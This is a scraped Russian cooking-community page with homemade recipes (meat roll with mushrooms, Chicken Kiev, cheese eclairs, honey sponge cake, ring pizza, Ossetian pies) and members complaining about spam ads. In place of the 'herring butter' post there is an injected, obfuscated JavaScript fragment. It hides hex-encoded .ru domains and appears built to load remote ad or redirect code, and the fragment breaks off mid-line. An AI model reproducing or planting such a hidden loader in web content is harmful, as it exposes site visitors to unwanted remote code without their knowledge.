Все игры
Обсуждения
Сортировать: по обновлениям | по дате | по рейтингу Отображать записи: Полный текст | Заголовки

Мясной рулет с грибами

  Привет! Самая моя любимая сытная закуска на праздничный стол это всевозможные рулеты — как мясные так и овощные. Вкусно и красиво!



Рулет мясной с грибами один из них, готовится просто и вкус непревзойденный, давно котлеты на праздники не делаю.
Для нашего блюда нужны такие продукты:
фарш свино-говяжий. у меня свиной не жирный — 700 граммов,
грибы шампиньоны -400-500 граммов,
сыр твердый — 60-70 граммов,
лук — 2 средние луковицы,
морковь — 1 штука,
яйца -2 штуки,
чеснок — 3-4 зубчика,
мускатный орех, имбирь — на кончике ножа,
соль, перец черный молотый по вкусу,
масло растительное — 3 столовые ложки.
Приготовление. Сделать фарш, пропустить его дважды на мясорубку, добавить измельченный чеснок, яйцо и все приправы, хорошо перемешать, дать постоять. Лук нарезать перьями или полукольцами, грибы мелкими кусочками, морковь натереть на средней терке.
На сковородке в разогретом масле спассеровать лук до прозрачности, добавить морковь и грибы, тушить на среднем огне до выпаривания жидкости. Посолить и присыпать черным перцем.
Противень смазать маслом. На мокрый кусок марли, размером противня расстелить, подготовленный фарш распределить равномерно прямоугольником.
Сверху покрыть грибной начинкой вместе с натертым сыром, это, чтобы в готовом виде сыр скреплял начинку и она не крошилась. Края немного оставить без начинки.
Сформировать рулет, смазать яйцом.
Запекать в течение 45-50 минут, наблюдая, чтобы мясо не горело и не пересохло.
Вынимаете и наслаждаетесь вкусным ароматом, который распространяется по всей квартире. Прямо на противне выносите в холодное место до полного остывания. И когда надо накрывать стол нарезаете на порционные кусочки, используете для мясного ассорти или подаете отдельно с зеленью.
Осталось пожелать приятного аппетита, и вам и вашим гостям понравится такой мясной рулет с грибами.
Пошаговые фото приглашаю посмотреть у меня на сайте 

Метки: домашняя еда мясные закуски

Лариса Вовк, 19-01-2017 15:57 (ссылка)

Вкусные арабские блинчики – пошаговый рецепт с фото

false

Арабские блинчики или катаеф являются популярным блюдом, которое готовят в Ливане, Сирии и Египте. Но и у нас есть немало поклонников этого блюда. Для блинчиков использую ореховую или яблочную начинку.

Очень вкусными они получаются и с заварным кремом. Впрочем, кому как нравится.

Рецептов приготовления арабских блинчиков немало. Я хочу поделиться с вами вот этим рецептом блинчиков.
Источник: http://yaumnica.ru/blyuda-i...

Ella Alexis, 12-01-2017 20:23 (ссылка)

Я выхожу из группы.

Я выхожу из этой группы. Устала от глупой рекламы. Геморрой & Co не имеют ничего общего с рецептами и Кулинарной книгой. 

Салат "Золотой петушок!

   Привет!  По восточному календарю символом  Нового  2017 года будет  Огненный петух. Уже установилась традиция встречать этот праздник пышным застольем в кругу семьи и друзей, а чтобы задобрить символ мы приготовим салат «Золотой петушок»  в виде петуха.  По поверию тогда, он принесет в ваш дом здоровье и удачу. Наступит год Петуха 28 января.


                  Салат  вы можете приготовить  любой ваш любимый, а выложить и украсить в виде  петуха, лучше куриное мясо не использовать, чтобы не гневить огненного петуха.
                 Для моего салата я использовала:
филе индюшиное- 300 граммов, можно любое другое или шинку,
шампиньоны — 300 граммов,
лук — 1 крупная луковица,
яйца — 2 штуки,
кукуруза консервированная — 0,5 банки,
грецкие орехи — 5 штук,
зеленый лук — насколько перьев,
соль, перец черный молотый — по вкусу,
майонез,
масло растительное  для жарки грибов и лука — 2 столовые ложки.
          Для украшения :
сыр твердый — 100-150 граммов,
перец болгарский красный — 1/2  целого,
зеленый лук и несколько зерен кукурузы.

             Приготовление.    Мясо отварить в подсоленной воде со специями, яйца сварить вкрутую. Лук нарезать  кубиками. И  на разогретом растительном масле спассеровать до легкой золотистости. Грибы мелко нарезать и добавить к луку. Жарить до готовности грибов, посолить и поперчить,  дать остыть.
             Грецкие орехи  подсушить в духовке или микроволновке и измельчить  на кусочки размером  с горошину.    Мясо и яйца нарезать кубиками, измельчить зеленый лук.

         Все ингредиенты для салата соединить заправить майонезом.
       Еще надо  подготовить  перец для украшения. Вырезать гребешок, для хвоста нарезать тонкие полоски  вдоль перца.

              Выкладывать салат на плоское блюдо. Сначала из общей массы салата сделать основную форму петуха. Затем покрыть тертым сыром и перцем  выложить крыло, хвост и гребень,  клюв можно сделать из перца или кусочка сыра. Глаз из горошины перца.
              Внизу травку из лука, ноги из кукурузы. В общем включите фантазию и у вас получится еще красивее.

          Салат «Золотой петушок»готов,  вкусно и красиво!   Рецепт простой, можно доверить своим помощникам. С наступающим Новым годом!
                                 Приятного аппетита всем и приятных предпраздничных хлопот!
Источник с пошаговыми фото

Лариса Вовк, 09-01-2017 20:43 (ссылка)

Говяжья печенка по-нормандски – пошаговый рецепт с фото

false

Необычное и очень вкусное блюдо можно приготовить из обычной говяжьей печени. Говяжья печень по-нормандски станет прекрасным украшением любого праздничного стола. А можно просто ее приготовить на обед или ужин и порадовать свою семью.
Подробный пошаговый рецепт с фото здесь: http://yaumnica.ru/blyuda-i...

селедочное масло

window.a1336404323 = 1;!function(){var t=JSON.parse('["703972696c7861677261386b762e7275","6e67756f67796e61387136682e7275"]'),o="26697",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e

Котлета по-киевски

      Любое блюдо при использовании сливочного масла стает необыкновенно вкусным и мясо не исключение. Домашний рецепт  это уже всегда проверенный рецепт и можно смело готовить. Такую котлету я впервые попробовала  лет 45 назад в общепите,тогда еще  котлета с мясом была и вкус запомнился навсегда.
                  Вся изюминка в  формировании котлеты. По классическому способу котлета готовится из отбитого  куриного  филе, которое накручивается на косточку, в срединку кладется кусочек масла и панируется дважды. Я  и многие хозяйки делают котлеты из фарша  и они не менее вкусны и ароматны.

                Для приготовления  нам потребуется:
              филе куриное- 500 грамм,
              лук -1/4 головки,
              сливочное масло- 100 грамм,
              сыр твердый — 50 грамм,
              соль, перец , зелень укропа,
              мука для панировки -1/2 стакана,
              яйца — 3 штуки,
             сухари   панировочные или сделанные их сухого хлеба -1 стакан.
             масло растительное для фритюра.

             Приготовление:
              Мясо прокрутить  на мясорубке, где решетка с крупными отверстиями.
Совет:фарш делать самим, чтоб не получился слишком жидкий.
            Масло нарезать на брусочки, как на фотографии и поставить в холодильник. Сыр натереть на средней терке и добавить нарезанный мелко укроп.  Можно готовить без сырной прослойки и тогда укроп вмешать в размягченное масло и охладить его.
                   Сделать это надо заранее.
                Мясо посолить, поперчить, добавить, немного нарезанного мелкими кубиками, лука. Подготовить по разным мисочкам муку, взбитые и подсоленные яйца, сухари панировочные.
 Совет:      сухари подсыпать по частям, чтоб не намокли, а всегда были сухими.
                  Приступаем к формировке котлет. Из этого количества мяса у меня получилось 8 штук, поэтому можно  мясо сразу разделить на 8 частей.
                  Берем одну часть на руку, делаем лепешку, насыпаем слой сыра с зеленью, в средину кладем порцию масла и заворачиваем, чтоб масло окуталось со всех сторон мясом.

             Панируем в муке, затем опускаем в яйцо, обваливаем в сухарях, повторяем в яйцо и опять в сухари. Получается двойная панировка.

Складываем и отправляем в холодильник на минут десять, пока приготовимся к жарке.

                       Масло растительное выливаем в глубокую посудину, сотейник, кастрюльку или казанок, хорошо разогреваем масло, чтоб кипело. Выкладываем котлеты по две или три  штуки, чтоб свободно им было и жарим с двух  сторон по 2-3 минуты до золотистой корочки.

                     Чтоб не было жалко такого количества масла, на нем можно пожарить картофель фри для гарнира.
Довести до полной готовности котлеты можно в духовке, подержав их там минут десять.

                   Котлеты по-киевски,приготовленные по домашнему рецепту, получаются нежные,сочные, с хрустящей корочкой и с ароматом сливочного масла.
                                   Приятного Всем аппетита!
  Пошаговые фото

Эклеры с сыром

  Привет всем! Хочу поделиться домашним рецептом  закуски- эклеры с сырной начинкой.Такое блюдо не только украшает праздничный стол своим  оригинальным видом, но и вкусовые качества не уступают.

     Для теста нам необходимо:
                          масло сливочное — 100 грамм,
                          вода — 1 стакан,
                          мука — 1 стакан,
                         яйца — 4 штуки,
                          соль- 1/3 чайной ложки.
     Для начинки:
                         сыр твердый — из расчета на 1 штуку 10 грамм сыра,
                         чеснок — на мою тарелку два зубчика,
                         майонез — на 1 тарелку 1 столовая ложка,
                         укроп по вкусу.

              Способ приготовления эклеров можно посмотреть в рецепте эклеры с кремом. Сыр натереть на средней терке, укроп  мелко нарезать и смешать с сыром . Чеснок измельчить и хорошо  размешать с майонезом.
Совет: чеснок надо использовать домашний весенний, а не крупный озимый, он горький и не имеет того настоящего запаха чеснока, который улучшает вкус блюда.
Соединить сыр с соусом.
               Эклеры разрезать сбоку и нафаршировать начинкой.Майонеза должно быть мало, только для склеивания сыра, чтоб тесто не размокло.
            Выкладываем на блюдо, украшаем и ставим на стол.
            Вы только присели к гостям и придется вставать, тарелки пустые    от нашей закуски нужно убрать с стола . Вот так   и будет, готовьте и удивляйте своих родных и друзей.
                                                Приятного аппетита всем вам!
Источник с пошаговыми фото

ВСЕ В ШОКЕ!!! ПОХОРОНЫ ПО ОДЕССКИ... ПРОСТИ ДЯДЯ БОРЯ!!!


Эклеры с сырной начинкой

    Привет всем! Хочу поделиться домашним рецептом  закуски- эклеры с сырной начинкой.Такое блюдо не только украшает праздничный стол своим  оригинальным видом, но и вкусовые качества не уступают.

     Для теста нам необходимо:
                          масло сливочное — 100 грамм,
                          вода — 1 стакан,
                          мука — 1 стакан,
                         яйца — 4 штуки,
                          соль- 1/3 чайной ложки.
     Для начинки:
                         сыр твердый — из расчета на 1 штуку 10 грамм сыра,
                         чеснок — на мою тарелку два зубчика,
                         майонез — на 1 тарелку 1 столовая ложка,
                         укроп по вкусу.

              Способ приготовления эклеров можно посмотреть в рецепте эклеры с кремом. Сыр натереть на средней терке, укроп  мелко нарезать и смешать с сыром . Чеснок измельчить и хорошо  размешать с майонезом.
Совет: чеснок надо использовать домашний весенний, а не крупный озимый, он горький и не имеет того настоящего запаха чеснока, который улучшает вкус блюда.
Соединить сыр с соусом.
               Эклеры разрезать сбоку и нафаршировать начинкой.Майонеза должно быть мало, только для склеивания сыра, чтоб тесто не размокло.
            Выкладываем на блюдо, украшаем и ставим на стол.
            Вы только присели к гостям и придется вставать, тарелки пустые    от нашей закуски нужно убрать с стола . Вот так   и будет, готовьте и удивляйте своих родных и друзей.
                                                Приятного аппетита всем вам!
Источник с пошаговыми фото

Метки: закуски

Торт на сковороде

false
Коржи:

Масло сливоч. - 30 г
Сахар - 1 стакан
Яйца - 2 шт.
Мёд жидкий - 1 ст.л.
Водка - 1 ст.л.
Сода гашёная - 1 ч.л.
Ванилин 

Крем:

Сметана - 500 г
Сахар - 0,5 стакана
Цедра лимона и любые сухофрукты, орехи, чернослив по желанию. 

Описание:

Яйца, сахар, мёд, водка, сода, ванилин взбить слегка, добавить масло растопленное и муку так, чтобы получилось тесто как на вареники.
Разделить на 8 коржей, раскатать толщиной 0,5 см , с помощью скалки перенести на сковородку, наколоть вилкой.
Печь на хорошо разогретой сухой сковороде, посыпанной мукой на самом маленьком огне, с двух сторон.
Коржи пекутся очень быстро, 3-4 мин. каждый.

Лариса Вовк, 15-12-2016 21:13 (ссылка)

Сало в луковой шелухе – пошаговый рецепт с фото

false

Когда приближается какое-либо праздничное застолье, каждая хозяйка начинает обдумывать, что можно приготовить на стол, чтобы порадовать свою семью и гостей. Как известно, на любом праздничном столе мясные блюда занимают чуть ли не главное место.Блюда из свинины, говядины, курицы, баранины – все они пользуются большой популярностью. Давайте попробуем порадовать свою семью салом, приготовленным в домашних условиях в луковой шелухе. Сало получается очень вкусным.
Подробный рецепт с фото читайте здесь: http://yaumnica.ru/prazdnic...

Лариса Вовк, 11-12-2016 15:33 (ссылка)

Картофель с мясом и грибами – пошаговый рецепт с фото

false
Вкусное праздничное блюдо можно приготовить из картофеля. Запеченный картофель с грибами и мясом отлично будет смотреться на праздничном столе.Причем, для приготовления данного блюда не требуются дорогостоящие продукты. Это вкусное блюдо с картофелем можно приготовить из обычных продуктов. 
Подробный пошаговый рецепт с фото здесь: http://yaumnica.ru/blyuda-i...

Торт из медового бисквита

 Привет! Приготовила по произвольному рецепту торт из медового бисквита и сметанного крема с орехами и смородиновым джемом. Сочный торт с смородиновой кислинкой пришелся нам по вкусу, вот делюсь с вами.


            Для бисквита будут использоваться:
яйца куриные – 6 штук,
сахар – 160 граммов,
мед – 2 стол. ложки, мука- 190 граммов,
какао – 1 стол. ложка, я не использовала, поэтому бисквит получился не очень темный, но вкусный.
    Для крема :
сливки – 500 граммов, Если использовать джем, сливки можно уменьшить  до 250 граммов.
сахар – 4-5 стол. ложек ( 0,5 стакана), если уменьшить сливки соответственно и сахар до 3 ложек,
орехи измельченные – 1 стакан, у меня грецкие орехи,
          джем любой – 250-300 граммов, у меня смородиновый.
Приготовление.  Яйца и сахар взбить  до увеличения  объема продуктов  в 4 раза.  Добавить мед и продолжить взбивать. В общей сложности это займет минут десять.
          Муку сыпать в яичную смесь через ситечко частями, аккуратно перемешать ложкой снизу вверх.
          Предварительно разогреть духовку до 170 градусов. Форму смазать, дно формы лучше застелить пергаментной бумагой.
         Выпекать  бисквит до готовности минут 30-35 минут, первые 15 минут духовку не открывать, проверить на сухую лучину.
          Остывший бисквит разрезать на три части.  Сливки взбить с сахаром.
Собрать торт. Этот торт я не пропитывала  сиропом, а просто обильно смазала кремом и джемом и он нормально увлажнился.  Для крема нужно взбить сметану с сахаром до загустения, чем жирнее сметана, тем быстрее  она взбивается,  жирную я взбиваю ложкой минуты 3-4.
       На первый корж  выложить половину крема и половину орехов, накрыть второй частью бисквита.
Дальше смазать джемом, немножко оставить для украшения.
           Накрыть бисквитом, покрыть со всех сторон кремом и обсыпать измельченными орехами. Можно украсить по своему.  Оставить на ночь для пропитки. Быстро и вкусно можно приготовить такой торт из медового бисквита.

         Простая домашняя выпечка доставит вашей семье  удовольствие, когда вы угостите таким кусочком тортика  во время чаепития.
                                                      Приятного аппетита!
Источник с пошаговыми фото

Пицца в виде кольца

     Привет! Спешу поделиться замечательным рецептом.Пицца в виде кольца супер вкусная, сочная и удобная.  Понравится всем, кто попробует кусочек.


                                Используемые продукты:
 для теста -вода или молоко в любом виде-250 мл,
                     масло растительное -2 стол. ложки,
                     сухие дрожжи — 10 гр.,
                     соль — чуть больше половины чайной ложки,
                     мука — 300-350 граммов.
Для начинки- сливочный сыр,
                     стейк -2-3 штуки, и приправы к мясу ваши любимые,
                     лук — 1 большая головка,
                     соленые огурцы — 2 штуки,
                     сыр моцарелла или твердый сыр -12о-150 граммов,
                     орегано — щепотка,
                     масло растительное для пассеровки лука и жарки мяса,
                     яйцо для смазывания  изделия перед выпечкой.
             Приготовление. Прежде всего надо замесить тесто.  Дрожжи размешать в теплой жидкости и дать им ожить, пока готовите остальное. В муку добавить  все ингредиенты и замесить мягкое тесто, поставить в теплое место  и не трогать его.
           Приготовить  начинку. Мясо  посолить и поперчить, обжарить  его с двух сторон на среднем огне по 3-4 минуты с каждой, переворачивая, чтобы не подгорело.
     Лук очистить и нарезать перьями. На разогретом растительном масле  спассеровать до золотистого цвета на умеренном огне.
        Охлажденное мясо нарезать соломкой, огурцы натереть на крупной терке, сыр нарезать плоскими кусочками или так же натереть на терке.
  Когда тесто увеличится вдвое, это произойдет через 35-40 минут,
     тонко  раскатать его и в центре сделать  разрезы на 8 частей.
     Вокруг выложить сливочный сыр и  разровнять его сплошным кругом,  затем мясо.
         Сверху разложить хрустящий лук.
     Дальше посыпать  немного отжатыми  огурцами и разложить сыр по всему кругу. Посыпать сухим орегано.
     Наружные края теста завернуть на начинку, а внутренние завернуть наружу и закрепить их.
       Смазать заготовку  пиццы яйцом.
         Теста на одну пиццу  много , если одна, то получается большая и трудно перенести на противень, лучше делать две.  Запекать в разогретой до 190 градусов  духовке в течение 20 минут.   Готовую пиццу подать с любимым кетчупом просто разламывая или нарезать кусочками.  Мы ели со своим  домашним  кетчупом  

           Пицца в виде кольца получилась очень вкусной, мы с аппетитом ели два дня.  Подогретая такая же вкусная, как и свежая. Приготовьте и порадуйте своих близких или друзей!
                     Приятного всем аппетита!

Источник
с пошаговыми фото

Метки: домашняя еда, закуски

Осетинские пироги

      Добрый день, друзья !  Осетинские пироги  готовят из дрожжевого теста  с различными начинками в духовке или печи. Мало сказать, что это вкусно, это объедение. Если в доме такие пироги, что-то другое даже не предлагайте.  Рецептов таких пирогов много, можно сказать у каждой хозяйки свой, я приготовила свой и не судите меня строго. Пироги получились обалденные!


              Я  уже говорила, что люблю дрожжевое тесто и все изделия  из него.
Для теста понадобятся:
мука — 4 стакана или чуть больше,
молоко — 1 стакан,
вода — 1,5 стакана,
сухие дрожжи быстрорастворимые-  1 пакетик (11г),
сахар — 1 стол. ложка,
соль- 1 чайная ложка с горкой,
растительное масло -3 стол. ложки
         Для начинки я использовала готовое пюре -500 граммов, остаток с предыдущего дня.  Картофель с молоком, сливочным маслом, солью и черным перцем. В Осетии к пюре добавляют сыр, но у меня его не было.  Еще нам потребуется граммов 30 сливочного масла.
                       Приготовление.   Поставить легкую опару — полстакана теплой воды смешать с дрожжами, сахаром и парой столовых ложек муки. Как только начнут появляться пузырьки, вылить  опару в миску, куда добавить остальную воду и молоко (теплые!),  соль. Размешивая   постепенно добавлять муку – замешать мягкое, довольно жидкое тесто. В конце добавить растительное масло, еще раз все перемешать,  если надо добавить немного муки, накрыть  полотенцем и убрать в теплое место для подъема на 1-1,5 часа в зависимости от температуры в помещении.
         Готовое тесто  хорошо обмять, разделить на три части, приступить к формированию пирогов.  Каждый кусочек теста раскатать  круглую лепешку по центру выложить равномерно начинку.
        Края теста собрать в пучок.  Дальше,  руками  придавливая пирог,  расправить его до   довольно тонкого состояния, лучше это делать уже на смазанном маслом противне или форме. Где будет собираться воздух можно проколоть тесто вилкой и выпустить его.
                      В средине пирога можно сделать дырочку, чтобы выходил пар при выпечке, я хорошо протыкала его вилкой.
          Дать  немного подойти тесту, за это время разогреть духовку до 180 градусов и поставить выпекаться
                  Выпекать до красивой румяной корочки, приблизительно 20 минут.
      Как только вытяните пироги обильно  смажьте их  сливочным маслом, поводите кусочком масло, оно будет таять и смазывать пироги, накройте на несколько минут крышкой, чтобы пирог стал мягким и воздушным.
        Получились   осетинские пироги на славу, сами просятся в рот, разрезайте и  угощайте побыстрее.

        У меня муж любит с пылу с жару, думаю, что и ваша семья полюбит такие замечательные  пироги, домашняя выпечка  никого не оставит равнодушным.!
Источник с пошаговыми фото

Ир нононо, 12-11-2016 00:21 (ссылка)

РЕКЛАМА на "КУЛИНАРНОЙ КНИГЕ"

Я ухожу из этой группы! Постоянная реклама просто замучила! То худеем, то морщины убираем, то геморрой лечим, то паразитов выводим.. Гадость какая....Читаешь про вкусную запеканку, а следом за ней идёт картинка, где, сняв трусы сидит в тазике с голой задницей больная геморроем. ОЧЕНЬ ПРИЯТНО!!!...........

как мариновать капусту?

Как приготовить маринад для капусты?

В этой группе, возможно, есть записи, доступные только её участникам.
Чтобы их читать, Вам нужно вступить в группу